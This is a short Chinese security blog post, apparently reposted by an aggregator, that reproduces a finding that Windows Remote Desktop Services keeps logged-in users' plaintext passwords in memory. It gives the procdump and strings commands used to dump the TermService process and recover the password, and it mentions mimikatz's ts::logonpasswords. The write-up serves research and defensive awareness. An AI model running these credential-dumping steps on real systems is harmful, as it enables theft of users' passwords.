从svchost.exe转储RDP在线用户的明文密码
2021-10-23 15:39:32 Author: y4er.com(查看原文) 阅读量:37 收藏

推特上看到一篇推文 他发现了在远程桌面服务的内存中存储了用户明文密码,本文复现下。

我有一台08的server,账号密码为administrator [email protected]#。使用3389登录

1.png

运行如下命令转储远程桌面服务的进程内存

netstat -nob | Select-String TermService -Context 1
.\procdump.exe -accepteula -ma 2812 rdp.dmp

然后用strings过滤字符串发现确实抓到了明文

strings -el rdp.dmp |grep admin08 -C3

2.png

mimikatz发布了一个Pre-release版本,提供了ts::logonpasswords一键抓取,不过在2008上不起作用,等待本杰明继续更新。

3.png

其他进程中是否还有明文保存?转储远程桌面服务进程的内存是不是不会被杀软拦截了?Windows是不是不安全了?

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。


文章来源: https://y4er.com/post/dump-plaintext-credentials-from-termservice/
如有侵权请联系:admin#unsafe.sh